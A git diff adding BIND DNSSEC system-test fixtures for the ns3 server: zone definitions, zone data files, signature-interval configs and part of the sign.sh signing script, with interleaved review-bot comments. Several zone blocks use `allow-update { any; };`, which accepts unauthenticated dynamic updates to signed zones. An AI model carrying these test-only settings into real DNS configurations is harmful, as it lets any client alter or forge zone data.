+zone "inline.example" {
+ type primary;
+ file "inline.example.db";
+ inline-signing yes;
+ auto-dnssec maintain;
+};
+
+zone "publish-inactive.example" {
+ type primary;
+ file "publish-inactive.example.db";
+ auto-dnssec maintain;
+ update-policy local;
+};
+
+zone "future.example" {
+ type primary;
+ file "future.example.db.signed";
+};
+
+zone "managed-future.example" {
+ type primary;
+ file "managed-future.example.db.signed";
+ allow-update { any; };
+};
+
+zone "revkey.example" {
+ type primary;
+ file "revkey.example.db.signed";
+};
+
+zone "dname-at-apex-nsec3.example" {
+ type primary;
+ file "dname-at-apex-nsec3.example.db.signed";
+};
+
+zone "occluded.example" {
+ type primary;
+ file "occluded.example.db.signed";
+};
+
+zone "secure.managed" {
+ type primary;
+ file "secure.managed.db.signed";
+};
+
+zone "disabled.managed" {
+ type primary;
+ file "disabled.managed.db.signed";
+};
+
+zone "enabled.managed" {
+ type primary;
+ file "enabled.managed.db.signed";
+};
+
+zone "unsupported.managed" {
+ type primary;
+ file "unsupported.managed.db.signed";
+};
+
+zone "revoked.managed" {
+ type primary;
+ file "revoked.managed.db.signed";
+};
+
+zone "secure.trusted" {
+ type primary;
+ file "secure.trusted.db.signed";
+};
+
+zone "disabled.trusted" {
+ type primary;
+ file "disabled.trusted.db.signed";
+};
+
+zone "enabled.trusted" {
+ type primary;
+ file "enabled.trusted.db.signed";
+};
+
+zone "unsupported.trusted" {
+ type primary;
+ file "unsupported.trusted.db.signed";
+};
+
+zone "revoked.trusted" {
+ type primary;
+ file "revoked.trusted.db.signed";
+};
+
+zone "too-many-iterations" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "too-many-iterations.bk";
+};
+
+include "siginterval.conf";
+
+include "trusted.conf";
diff --git a/bin/tests/system/dnssec/ns3/nosign.example.db.in b/bin/tests/system/dnssec/ns3/nosign.example.db.in
new file mode 100644
index 0000000..2be8a28
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/nosign.example.db.in
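Review bot: Nothing in named.conf.in marks it as a test fixture, yet `key rndc_key` carries a fixed secret committed to the tree, `controls` accepts the control channel with `allow { any; }`, and many primary zones set `allow-update { any; };`, which accepts unsigned dynamic updates from any client that can reach the listener. That is presumably acceptable only because the server binds to the 10.53.0.3 test address, so I would state it beside `// NS3`, e.g. `// Test fixture: fixed rndc secret and open allow-update rely on the isolated 10.53.0.x test addresses; do not reuse in a deployed config.` Separately, `allow-update { !0.0.0.0; };` in `auto-nsec.example` and `auto-nsec3.example` needs a one-line comment, since an ACL holding only a negated element appears to match no client and so reads as a way to make the zone dynamic without accepting updates.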
@@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 diff --git a/bin/tests/system/dnssec/ns3/nsec3-unknown.example.db.in b/bin/tests/system/dnssec/ns3/nsec3-unknown.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nsec3-unknown.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/nsec3.example.db.in b/bin/tests/system/dnssec/ns3/nsec3.example.db.in new file mode 100644 index 0000000..55b3877 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nsec3.example.db.in 
@@ -0,0 +1,38 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +child NS ns2.example. +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17 diff --git a/bin/tests/system/dnssec/ns3/nsec3.nsec3.example.db.in b/bin/tests/system/dnssec/ns3/nsec3.nsec3.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nsec3.nsec3.example.db.in 
@@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/dnssec/ns3/nsec3.optout.example.db.in b/bin/tests/system/dnssec/ns3/nsec3.optout.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/nsec3.optout.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + 
diff --git a/bin/tests/system/dnssec/ns3/occluded.example.db.in b/bin/tests/system/dnssec/ns3/occluded.example.db.in new file mode 100644 index 0000000..ee9c900 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/occluded.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a.b A 10.0.0.1 +delegation NS ns + A 10.53.0.3 + AAAA 2002:: diff --git a/bin/tests/system/dnssec/ns3/optout-unknown.example.db.in b/bin/tests/system/dnssec/ns3/optout-unknown.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/optout-unknown.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. 
diff --git a/bin/tests/system/dnssec/ns3/optout.example.db.in b/bin/tests/system/dnssec/ns3/optout.example.db.in new file mode 100644 index 0000000..20c19c5 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/optout.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +child NS ns2.example. +insecure.empty NS ns.insecure.empty +ns.insecure.empty A 10.53.0.3 +foo.*.empty-wild NS ns diff --git a/bin/tests/system/dnssec/ns3/optout.nsec3.example.db.in b/bin/tests/system/dnssec/ns3/optout.nsec3.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/optout.nsec3.example.db.in 
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/dnssec/ns3/optout.optout.example.db.in b/bin/tests/system/dnssec/ns3/optout.optout.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/optout.optout.example.db.in
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/dnssec/ns3/publish-inactive.example.db.in b/bin/tests/system/dnssec/ns3/publish-inactive.example.db.in
new file mode 100644
index 0000000..14971bd
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/publish-inactive.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
diff --git a/bin/tests/system/dnssec/ns3/rsasha256.example.db.in b/bin/tests/system/dnssec/ns3/rsasha256.example.db.in
new file mode 100644
index 0000000..f6c4fab
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/rsasha256.example.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
diff --git a/bin/tests/system/dnssec/ns3/rsasha512.example.db.in b/bin/tests/system/dnssec/ns3/rsasha512.example.db.in
new file mode 100644
index 0000000..f6c4fab
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/rsasha512.example.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
diff --git a/bin/tests/system/dnssec/ns3/secure.below-cname.example.db.in b/bin/tests/system/dnssec/ns3/secure.below-cname.example.db.in
new file mode 100644
index 0000000..14971bd
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/secure.below-cname.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
diff --git a/bin/tests/system/dnssec/ns3/secure.example.db.in b/bin/tests/system/dnssec/ns3/secure.example.db.in
new file mode 100644
index 0000000..ec39308
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/secure.example.db.in
@@ -0,0 +1,49 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns3
+ns3 A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+d A 10.0.0.4
+e A 10.0.0.5
+f A 10.0.0.6
+g A 10.0.0.7
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+zz DNSKEY 258 3 5 Cg==
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns2.insecure
+ns2.insecure A 10.53.0.2
+
+nosoa NS ns.nosoa
+ns.nosoa A 10.53.0.7
+
+normalthenrrsig A 10.0.0.28
+rrsigonly A 10.0.0.29
+
+cnameandkey CNAME @
+cnamenokey CNAME @
+dnameandkey DNAME @
diff --git a/bin/tests/system/dnssec/ns3/secure.nsec3.example.db.in b/bin/tests/system/dnssec/ns3/secure.nsec3.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/secure.nsec3.example.db.in
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/dnssec/ns3/secure.optout.example.db.in b/bin/tests/system/dnssec/ns3/secure.optout.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/secure.optout.example.db.in
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/dnssec/ns3/siginterval.example.db.in b/bin/tests/system/dnssec/ns3/siginterval.example.db.in
new file mode 100644
index 0000000..ec6603a
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/siginterval.example.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2012042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+@ NS ns
+ns A 10.53.0.3
diff --git a/bin/tests/system/dnssec/ns3/siginterval1.conf b/bin/tests/system/dnssec/ns3/siginterval1.conf
new file mode 100644
index 0000000..4674cf3
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/siginterval1.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "siginterval.example" {
+ type primary;
+ allow-update { any; };
+ sig-validity-interval 1 23;
+ dnskey-sig-validity 90;
+ auto-dnssec maintain;
+ file "siginterval.example.db";
+};
diff --git a/bin/tests/system/dnssec/ns3/siginterval2.conf b/bin/tests/system/dnssec/ns3/siginterval2.conf
new file mode 100644
index 0000000..46a2007
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/siginterval2.conf
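Review bot: `allow-update { any; };` in the siginterval1.conf zone block accepts dynamic updates from any source address with no TSIG key, and because the zone also sets `auto-dnssec maintain;` the server will sign whatever record an update adds. That is presumably acceptable only because ns3 runs on the 10.53.0.3 test address, but nothing in the file says so, and fixtures like this get copied. I would add a comment above the zone block such as `/* test fixture only: unauthenticated dynamic updates; do not reuse outside the system-test network */`, or, if the siginterval test does not actually send updates, drop the statement. siginterval2.conf repeats the same block with a different `sig-validity-interval`, so the same comment applies there.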
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "siginterval.example" {
+ type primary;
+ allow-update { any; };
+ sig-validity-interval 35 28;
+ dnskey-sig-validity 90;
+ auto-dnssec maintain;
+ file "siginterval.example.db";
+};
diff --git a/bin/tests/system/dnssec/ns3/sign.sh b/bin/tests/system/dnssec/ns3/sign.sh
new file mode 100644
index 0000000..aba74be
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/sign.sh
@@ -0,0 +1,673 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +echo_i "ns3/sign.sh" + +infile=key.db.in +for tld in managed trusted +do + # A secure zone to test. + zone=secure.${tld} + zonefile=${zone}.db + + keyname1=$("$KEYGEN" -f KSK -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + cat "$infile" "$keyname1.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.signed "$zonefile" > /dev/null + + # Zone to test trust anchor that matches disabled algorithm. + zone=disabled.${tld} + zonefile=${zone}.db + + keyname2=$("$KEYGEN" -f KSK -q -a "$DISABLED_ALGORITHM" -b "$DISABLED_BITS" -n zone "$zone") + cat "$infile" "$keyname2.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.signed "$zonefile" > /dev/null + + # Zone to test trust anchor that has disabled algorithm for other domain. + zone=enabled.${tld} + zonefile=${zone}.db + + keyname3=$("$KEYGEN" -f KSK -q -a "$DISABLED_ALGORITHM" -b "$DISABLED_BITS" -n zone "$zone") + cat "$infile" "$keyname3.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.signed "$zonefile" > /dev/null + + # Zone to test trust anchor with unsupported algorithm. 
+ zone=unsupported.${tld} + zonefile=${zone}.db + + keyname4=$("$KEYGEN" -f KSK -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + cat "$infile" "$keyname4.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.tmp "$zonefile" > /dev/null + awk '$4 == "DNSKEY" { $7 = 255 } $4 == "RRSIG" { $6 = 255 } { print }' ${zonefile}.tmp > ${zonefile}.signed + + # Make trusted-keys and managed keys conf sections for ns8. + mv ${keyname4}.key ${keyname4}.tmp + awk '$1 == "unsupported.'"${tld}"'." { $6 = 255 } { print }' ${keyname4}.tmp > ${keyname4}.key + + # Zone to test trust anchor that is revoked. + zone=revoked.${tld} + zonefile=${zone}.db + + keyname5=$("$KEYGEN" -f KSK -f REVOKE -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + cat "$infile" "$keyname5.key" > "$zonefile" + "$SIGNER" -z -P -3 - -o "$zone" -O full -f ${zonefile}.signed "$zonefile" > /dev/null + + case $tld in + "managed") + keyfile_to_initial_keys $keyname1 $keyname2 $keyname3 $keyname4 $keyname5 > ../ns8/managed.conf + ;; + "trusted") + keyfile_to_static_keys $keyname1 $keyname2 $keyname3 $keyname4 $keyname5 > ../ns8/trusted.conf + ;; + esac +done + +echo_i "ns3/sign.sh: example zones" + +zone=secure.example. +infile=secure.example.db.in +zonefile=secure.example.db + +cnameandkey=$("$KEYGEN" -T KEY -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n host "cnameandkey.$zone") +dnameandkey=$("$KEYGEN" -T KEY -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n host "dnameandkey.$zone") +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$cnameandkey.key" "$dnameandkey.key" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +zone=bogus.example. 
